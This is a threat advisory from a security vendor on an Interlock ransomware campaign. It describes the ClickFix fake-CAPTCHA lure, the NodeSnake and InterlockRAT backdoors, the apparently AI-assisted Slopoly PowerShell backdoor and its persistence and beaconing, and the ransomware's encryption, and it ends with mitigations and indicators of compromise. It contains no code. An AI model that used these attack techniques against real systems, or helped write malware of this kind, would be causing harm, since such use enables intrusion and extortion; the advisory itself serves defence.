Comprehensive Threat Exposure Management Platform
Critical Threat Research : Middle-East at WAR: The Rapidly Escalating Iranian Cyber Threat Download the Report Critical Threat Research : Middle-East at WAR: The Rapidly Escalating Iranian Cyber Threat Download the ReportA recent Interlock ransomware intrusion has revealed the deployment of Slopoly, a suspected AI-assisted PowerShell backdoor that enabled the threat actor Hive0163 to maintain persistent access to a compromised server for over a week while conducting reconnaissance and data staging operations. This Interlock ransomware attack campaign targets corporate enterprises worldwide across Windows and Linux platforms, utilizing sophisticated social engineering techniques and multi-stage malware deployment to achieve ransomware objectives. The attack began with a ClickFix social engineering tactic, where victims encountered a fake CAPTCHA-style verification page that secretly copied a malicious PowerShell script to the clipboard and instructed them to open the Windows Run dialog, paste the content, and execute it, thereby initiating the infection chain.
The Slopoly backdoor represents a significant evolution in ransomware attack methodologies, with researchers identifying multiple characteristics suggesting the malware code may have been generated or assisted by large language models, including extensive inline comments, structured logging capabilities, robust error handling mechanisms, and unused functions that are typical of AI-generated code. Following initial compromise through ClickFix social engineering, the threat actor Hive0163 deployed a multi-stage malware chain including NodeSnake, a Node.js-based first-stage malware that communicates through HTTP POST requests, and InterlockRAT, a JavaScript-based backdoor that communicates through WebSockets and provides expanded control capabilities including SOCKS5 tunnel creation and reverse shell spawning.
Using this established access, the Interlock ransomware attackers conducted extensive reconnaissance using tools like Advanced IP Scanner for internal network discovery, staged data for exfiltration using AzCopy cloud storage transfer utilities, and ultimately deployed Interlock ransomware delivered as a 64-bit Windows executable via the JunkFiction loader. The ransomware encrypts files using AES-GCM with RSA-protected keys through a statically linked OpenSSL library, appends extensions such as .!NT3RLOCK or .int3R1Ock to encrypted files, and drops ransom notes named FIRST_READ_ME.txt in affected directories demanding payment for decryption.
A recently uncovered intrusion involving the Interlock ransomware group revealed the deployment of a new backdoor called Slopoly, a malware strain that cybersecurity researchers believe may have been developed with the assistance of generative artificial intelligence technologies. During the security incident, the Interlock ransomware attackers managed to maintain persistent access to a compromised server for more than a week while quietly collecting sensitive data and preparing for ransomware deployment. The intrusion began with a ClickFix social engineering tactic, an increasingly popular attack technique where victims are tricked into executing malicious PowerShell commands disguised as legitimate system actions.
In this specific attack case, the victim encountered a fake CAPTCHA-style verification page that secretly copied a malicious script to the Windows clipboard and provided instructions directing them to open the Windows Run dialog using the Win+R keyboard shortcut, paste the clipboard content, and execute the command. This initial access technique is commonly associated with the threat actor Hive0163, which frequently combines ClickFix social engineering with malvertising campaigns and assistance from initial access brokers to compromise target organizations.
Once the victim executed the malicious command copied to their clipboard, the script automatically deployed NodeSnake, a Node.js-based malware that serves as the first stage of the attacker’s command-and-control framework. NodeSnake communicates with its remote operators through HTTP POST requests and supports multiple malicious capabilities, including downloading and executing additional payloads, running arbitrary shell commands on the compromised system, establishing persistence mechanisms to survive system reboots, and updating itself when required by the threat actors to add new functionality or evade detection.
Following the NodeSnake deployment, the attackers delivered a secondary payload known as InterlockRAT, a JavaScript-based backdoor that significantly expands the attacker’s control over the compromised system and network environment. InterlockRAT communicates with its operators through WebSocket connections and provides advanced capabilities including creating SOCKS5 proxy tunnels for network pivoting, spawning reverse shells for interactive command execution, and delivering additional malware payloads as needed throughout the attack progression. Both NodeSnake and InterlockRAT rely on hardcoded Cloudflare Tunnel infrastructure to conceal their command-and-control servers from network monitoring and security detection systems.
With initial access firmly established through NodeSnake and InterlockRAT, the attackers deployed Slopoly, a PowerShell-based backdoor placed in the C:\ProgramData\Microsoft\Windows\Runtime directory and configured to run persistently via a Windows scheduled task named “Runtime Broker” to masquerade as a legitimate Windows system process. Slopoly functions as a lightweight yet fully functional backdoor that collects system details such as the public IP address, username, privilege level, and hostname from the compromised machine.
This collected system information is transmitted as JSON-formatted heartbeat messages to the attacker’s command-and-control server every 30 seconds, while the malware simultaneously polls for new commands from the operators roughly every 50 seconds. Any received commands from the threat actors are executed through cmd.exe, and the command execution results are sent back to the server for operator review. The Slopoly script also maintains a rotating log file named persistence.log to track its operations.
Cybersecurity researchers noted several distinctive characteristics suggesting the Slopoly code may have been generated or assisted by a large language model such as ChatGPT or similar AI systems, including extensive inline comments explaining code functionality, structured logging with detailed error messages, robust error handling mechanisms throughout the codebase, and unused functions such as a “Jitter” routine that appears to have been generated but never actually implemented in the final malware. These characteristics are typical hallmarks of AI-generated code rather than traditional human-written malware.
Throughout the intrusion timeframe, the Hive0163 threat actor also deployed common ransomware operator tools to facilitate their objectives, including AzCopy for data staging and exfiltration to cloud storage platforms, and Advanced IP Scanner for internal network reconnaissance to identify additional targets and high-value systems within the compromised environment. These reconnaissance and data collection activities occurred over the course of more than a week, during which the attackers quietly gathered sensitive information while preparing for the final ransomware deployment phase.
The final stage of the attack involved deploying Interlock ransomware, delivered as a 64-bit Windows executable via the JunkFiction loader component. The Interlock ransomware encrypts victim files using AES-GCM encryption with RSA-protected encryption keys implemented through a statically linked OpenSSL library embedded in the malware executable. The ransomware appends distinctive file extensions such as .!NT3RLOCK or .int3R1Ock to encrypted files, and drops ransom notes named FIRST_READ_ME.txt in affected directories instructing victims on payment procedures.
Interlock ransomware also supports several command-line options that allow it to run with SYSTEM-level privileges for maximum file access, unlock files using the Windows Restart Manager API to encrypt files that are currently open by other processes, and remove itself after execution using a DLL component launched via rundll32.exe to eliminate forensic evidence of the attack.
Deploy security measures specifically targeting ClickFix social engineering attacks, such as disabling the Win+R keyboard shortcut via Group Policy on endpoints where it is not required for business operations, monitoring the RunMRU registry key for suspicious entries that indicate malicious command execution, and restricting PowerShell execution policies on endpoints to prevent unauthorized script execution by non-administrative users.
Shift detection strategies to focus on behavioral analysis rather than relying solely on signature-based or malware-specific detection mechanisms, as AI-generated malware like Slopoly can be easily regenerated with different function names, variable names, and configuration values, effectively evading traditional signature-based detection systems while maintaining the same malicious functionality.
Implement comprehensive alerting on the creation of new Windows scheduled tasks, particularly those named “Runtime Broker” or using similar names that mimic legitimate Windows system processes, and any scheduled tasks that execute PowerShell scripts or cmd.exe from ProgramData directories which are commonly abused by threat actors for malware persistence.
Enforce PowerShell Constrained Language Mode across enterprise endpoints to limit script capabilities, and implement application whitelisting technologies to prevent unauthorized PowerShell scripts from executing on systems. Deploy monitoring for PowerShell processes making outbound HTTP POST requests at regular intervals, which may indicate command-and-control beaconing activity associated with backdoor malware.
Deploy detection rules for the unauthorized use of AzCopy and other cloud storage data transfer utilities within the enterprise environment, especially when executed outside of sanctioned IT operations workflows, as these legitimate tools are commonly abused by ransomware operators for large-scale data staging and exfiltration activities prior to encryption.
Implement network segmentation to restrict lateral movement between critical systems and business units. Deploy micro-segmentation architectures for high-value servers to prevent ransomware propagation across network segments, limiting the potential blast radius of any successful compromise.
Maintain offline, immutable backups that are regularly tested for restoration capability to ensure business continuity in the event of ransomware encryption. Ensure backup systems are completely isolated from the production network to prevent ransomware from encrypting or destroying backup data during an attack, rendering recovery impossible.
The threat advisory includes comprehensive indicators of compromise associated with the Slopoly and Interlock ransomware campaign, including SHA256 file hashes, IPv4 addresses of command-and-control infrastructure, malicious domains including numerous Cloudflare Tunnel subdomains used to conceal attacker infrastructure, and the primary domain plurfestivalgalaxy.com. Organizations should integrate these indicators into their security monitoring systems, endpoint detection platforms, and network security devices to identify potential Hive0163 and Interlock ransomware activity within their environments.
The Slopoly and Interlock ransomware attack campaign employs multiple tactics and techniques mapped to the MITRE ATT&CK framework, including execution through malicious copy-and-paste user execution, malicious file execution, and command and scripting interpreters including PowerShell, Windows Command Shell, and JavaScript, persistence via scheduled tasks and DLL hijacking, discovery of system network configuration, system information, and network services, command and control using application layer protocols over web protocols with protocol tunneling, internal proxy capabilities, and web service abuse, exfiltration over web services, and impact through data encryption for ransom and service termination.
The threat advisory references authoritative security research from IBM X-Force on Slopoly and AI-enhanced ransomware attacks, and HivePro threat intelligence on Interlock ransomware deployment tactics. These references provide additional technical depth and analysis for security teams investigating Hive0163 activity or implementing defensive measures against Interlock ransomware and AI-assisted malware threats.
Get through updates and upcoming events, and more directly in your inbox